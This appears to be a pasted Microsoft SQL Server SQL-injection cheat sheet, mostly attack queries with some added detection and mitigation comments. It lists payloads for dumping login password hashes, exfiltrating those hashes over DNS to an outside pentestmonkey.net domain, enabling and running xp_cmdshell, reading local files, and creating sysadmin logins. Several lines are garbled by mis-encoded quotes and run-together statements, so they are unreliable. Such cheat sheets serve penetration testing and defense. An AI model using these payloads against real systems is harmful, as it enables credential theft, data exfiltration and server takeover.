
Microsoft SQL Server SQL Injection Cheatsheet

IT-Academy Nov 24th, 2019 283 Never
  -- MSSQL SQL-injection cheat sheet (Slovak section headers translated to English).
  -- Throughout, a trailing "-- priv" marks statements the author flags as needing elevated server rights.
  1. -- 01. Open and go through the list of scripts
  2. -- https://pastebin.com/gXz34tXk
  3. -- http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
  4.  
  5. -- Version  
  6. SELECT @@version
  7.  
  8. -- Comments  
  9. SELECT 1 -- Comment
  10. SELECT /* Comment */ 1
  11.  
  12. -- Current user
  13. SELECT user_name();
  14. SELECT system_user;
  15. SELECT user;
  16. SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID;
  17.  
  18. -- List the process of a specific user (sp_who argument syntax summary)
  19. EXEC sp_who [ [ @loginame = ] 'login' | session ID | 'ACTIVE' ];
  20.  
  21. -- Show all active processes
  22. EXEC sp_who 'active';
  23.  
  24. -- List the process of a specific user
  25. EXEC sp_who 'MSI_MR_FIRMA\IT Academy';
  26.  
  27. -- Show a specific process identified by its session ID
  28. EXEC sp_who '10' -- specifies the process_id;
  29.  
  30. -- List of users  
  31. SELECT name FROM master..syslogins
  32.  
  33. -- List of DBs
  34. SELECT name, database_id, create_date FROM sys.databases;
  35. SELECT name FROM master.sys.databases;
  36. SELECT name FROM master.dbo.sysdatabases;
  37. -- To exclude system databases:
  38. -- WHERE name NOT IN ('master', 'tempdb', 'model', 'msdb');
  39.  
  40. -- SELECT [name]
  41. -- FROM master.dbo.sysdatabases
  42. -- WHERE database_id > 6
  43.  
  -- NOTE(review): the NOT IN already excludes the four system databases; the extra
  -- database_id filter differs between the two variants (> 6 above, > 7 here) -- confirm which is intended.
  44. SELECT name, database_id, create_date
  45. FROM sys.databases
  46. WHERE name NOT IN ('master', 'tempdb', 'model', 'msdb')
  47. and database_id > 7;
  48.  
  49. EXEC sp_databases;
  50.  
  51. -- show databases;
  52. --USE AdventureWorks2017;  
  53. --GO  
  54. --SELECT name, database_id, create_date  
  55. --FROM sys.databases ;  
  56. --GO
  57.  
  58. -- List of password hashes
  -- Mitigation: every hash read below is marked "priv" -- an application login held to least
  -- privilege cannot run them, which is the control that limits damage when injection does occur.
  59. SELECT name, password FROM master..syslogins -- priv, mssql 2000;
  60. SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..syslogins -- priv, mssql 2000.  Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.
  61. SELECT name, password_hash FROM master.sys.sql_logins -- priv, mssql 2005;
  62. SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins -- priv, mssql 2005
  63.  
  64. -- Password Cracker
  65. MSSQL 2000 and 2005 Hashes are both SHA1-based.  phrasen|drescher can crack these.
  66.  
  67. -- List Privileges  – current privs on a particular object in 2005, 2008
  68. -- current database
  69. SELECT permission_name FROM master..fn_my_permissions(null, 'DATABASE');
  70. -- current server
  71. SELECT permission_name FROM master..fn_my_permissions(null, 'SERVER');
  72. -- permissions on a table
  73. SELECT permission_name FROM master..fn_my_permissions('master..syslogins', 'OBJECT');
  74. SELECT permission_name FROM master..fn_my_permissions('sa', 'USER');
  75.  
  76. -- Permissions on a user– current privs in 2005, 2008
  77. SELECT is_srvrolemember('sysadmin');
  78. SELECT is_srvrolemember('dbcreator');
  79. SELECT is_srvrolemember('bulkadmin');
  80. SELECT is_srvrolemember('diskadmin');
  81. SELECT is_srvrolemember('processadmin');
  82. SELECT is_srvrolemember('serveradmin');
  83. SELECT is_srvrolemember('setupadmin');
  84. SELECT is_srvrolemember('securityadmin');
  85.  
  86. -- who has a particular priv? 2005, 2008
  -- Defender view: the same queries double as a periodic audit of which logins hold fixed server roles.
  87. SELECT name FROM master..syslogins WHERE denylogin = 0;
  88. SELECT name FROM master..syslogins WHERE hasaccess = 1;
  89. SELECT name FROM master..syslogins WHERE isntname = 0;
  90. SELECT name FROM master..syslogins WHERE isntgroup = 0;
  91. SELECT name FROM master..syslogins WHERE sysadmin = 1;
  92. SELECT name FROM master..syslogins WHERE securityadmin = 1;
  93. SELECT name FROM master..syslogins WHERE serveradmin = 1;
  94. SELECT name FROM master..syslogins WHERE setupadmin = 1;
  95. SELECT name FROM master..syslogins WHERE processadmin = 1;
  96. SELECT name FROM master..syslogins WHERE diskadmin = 1;
  97. SELECT name FROM master..syslogins WHERE dbcreator = 1;
  98. SELECT name FROM master..syslogins WHERE bulkadmin = 1;
  99.  
  100. -- List DBA Accounts   
  101. -- is your account a sysadmin?  returns 1 for true, 0 for false, NULL for invalid role.  Also try 'bulkadmin', 'systemadmin' and other values from the documentation ('systemadmin' is not a fixed server role name, so it falls into the NULL case; 'sysadmin' is the real one)
  102. SELECT is_srvrolemember('sysadmin');
  103. -- is sa a sysadmin? return 1 for true, 0 for false, NULL for invalid role/username.
  104. SELECT is_srvrolemember('sysadmin', 'sa');
  105. -- tested on 2005
  106. SELECT name FROM master..syslogins WHERE sysadmin = '1';
  107. -- Current Database
  108. SELECT DB_NAME();
  109.  
  110. -- List Databases  
  111. SELECT name FROM master..sysdatabases;
  112.  
  113. -- For N = 0, 1, 2, …
  114. SELECT DB_NAME(N);
  115.  
  116. -- List Columns
  117. -- For the current DB only
  118. SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable');
  119. SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable';
  120.  
  121. -- list column names and types for master..sometable (describes the query above)
  122. List Tables SELECT name FROM master..sysobjects WHERE xtype = 'U'; -- use xtype = 'V' for views
  123. SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U';
  124. SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable';
  125.  
  126. -- list column names and types for master..sometable (duplicate of the earlier query)
  127. -- Find Tables From Column Name – NB: This example works only for the current database.  If you want to
  128. -- search another db, you need to specify the db name (e.g. replace sysobject with mydb..sysobjects).
  129. SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' AND syscolumns.name LIKE '%PASSWORD%' — this lists table, column for each column containing the word 'password'
  130.  
  131. -- Select Nth Row  
  132. SELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins ORDER BY name ASC) sq ORDER BY name DESC
  133. -- gets 9th row
  134. -- Select Nth Char 
  135. SELECT substring('abcd', 3, 1) -- returns c
  136.  
  137. -- Bitwise AND 
  138. SELECT 6 & 2 -- returns 2
  139. SELECT 6 & 1 -- returns 0
  140. ASCII Value -> Char SELECT char(0×41) -- returns A (the '×' here is a mis-encoded 'x')
  141. Char -> ASCII Value SELECT ascii('A') -- returns 65
  142.  
  143. -- Casting 
  144. SELECT CAST('1' as int);
  145. SELECT CAST(1 as char)
  146.  
  147. -- String Concatenation
  148. SELECT 'A' + 'B' -- returns AB
  149.  
  150. -- If Statement
  151. IF (1=1) SELECT 1 ELSE SELECT 2 -- returns 1
  152.  
  153. -- Case Statement  
  154. SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END -- returns 1
  155.  
  156. -- Avoiding Quotes  SELECT char(65)+char(66) -- returns AB
  157. -- Time Delay    
  -- Detection: a WAITFOR DELAY arriving on an application connection is a strong blind-injection
  -- indicator; alert on the statement text itself, not only on the resulting latency.
  158. WAITFOR DELAY '0:0:5′ -- pause for 5 seconds (the closing ′ is a mis-encoded apostrophe)
  159.  
  160. -- Make DNS Requests   
  -- Detection/mitigation: the observable is the database server resolving and reaching out to a
  -- name chosen by the injected query; egress filtering of the database tier and alerting on
  -- unexpected outbound name resolution from it are the controls.
  161. declare @host varchar(800); select @host = name FROM master..syslogins; exec('master..xp_getfiledetails '\' + @host + 'c$boot.ini'); -- nonpriv, works on 2000declare @host varchar(800); select @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.2.pentestmonkey.net' from sys.sql_logins; exec('xp_fileexist ”\' + @host + 'c$boot.ini”'); -- priv, works on 2005– NB: Concatenation is not allowed in calls to these SPs, hence why we have to use @host.  Messy but necessary.
  162. – Also check out theDNS tunnel feature of sqlninja
  163.  
  164. -- Command Execution   
  -- Mitigation/detection: xp_cmdshell is disabled by default (see the note below); keep it that way
  -- and audit sp_configure 'xp_cmdshell' / RECONFIGURE, which are server-level configuration changes.
  165. EXEC xp_cmdshell 'net user';
  166. -- priv. On MSSQL 2005 you may need to reactivate xp_cmdshell first as it's disabled by default:
  167. EXEC sp_configure 'show advanced options', 1; -- priv
  168. RECONFIGURE; -- priv
  169. EXEC sp_configure 'xp_cmdshell', 1; -- priv
  170. RECONFIGURE; -- priv
  171.  
  172. -- Local File Access   
  -- BULK INSERT needs the bulkadmin server role (ADMINISTER BULK OPERATIONS), the role probed earlier
  -- with is_srvrolemember('bulkadmin'); an application login without it cannot read local files this way.
  173. CREATE TABLE mydata (line varchar(8000));
  174. BULK INSERT mydata FROM 'c:boot.ini';
  175. DROP TABLE mydata;
  176.  
  177. -- Hostname, IP Address
  178. SELECT HOST_NAME()
  179.  
  180. -- Create Users
  -- Detection: login creation and sysadmin role grants (here and under "Make User DBA" below) are
  -- persistence steps; server-level auditing of login and role-membership changes catches them.
  181. EXEC sp_addlogin 'user', 'pass'; -- priv
  182.  
  183. -- Drop Users   
  184. EXEC sp_droplogin 'user'; -- priv
  185.  
  186. -- Make User DBA   
  187. EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin'; -- priv
  188.  
  189. -- Location of DB files
  190. EXEC sp_helpdb master; -- location of master.mdf
  191. EXEC sp_helpdb pubs; -- location of pubs.mdf
  192.  
  193. -- Default/System Databases: northwind
  194. model
  195. msdb
  196. pubs -- not on sql server 2005
  197. tempdb